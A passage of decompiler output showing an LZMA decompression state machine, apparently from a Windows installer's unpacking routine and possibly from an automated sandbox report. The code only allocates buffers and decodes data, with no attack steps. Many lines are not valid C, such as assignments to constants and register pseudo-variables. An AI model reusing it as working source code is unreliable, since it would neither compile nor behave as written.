									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
